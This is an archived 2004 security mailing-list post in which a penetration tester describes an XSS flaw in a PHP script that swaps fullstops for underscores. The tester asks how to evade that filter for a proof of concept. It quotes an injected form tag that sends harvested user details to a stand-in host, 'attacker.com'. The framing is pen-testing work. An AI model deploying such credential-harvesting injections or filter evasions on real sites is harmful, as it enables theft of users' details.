mailing list archives
Fullstop Substitution in XSS
From: "Calum Power" <enune () fribble net>
Date: Sat, 29 May 2004 14:49:29 +1000 (EST)
As a part of a recent Pen-Test, I came across an XSS vulnerabiity. The PHP
script that has this vuln is filtering fullstops (.) and replacing them
with underscores (_).
Now, I'm trying trying to write a Proof-of-Concept, in which a
(convincing) form would be outputted that could 'harvest' user details and
send them to an attacker's webserver.
My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script"> is of course being filtered
into: <form target="http://attacker_com/path/to/script">
Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).
Any help would be appreciated.
enune () fribble net
- Fullstop Substitution in XSS Calum Power (May 31)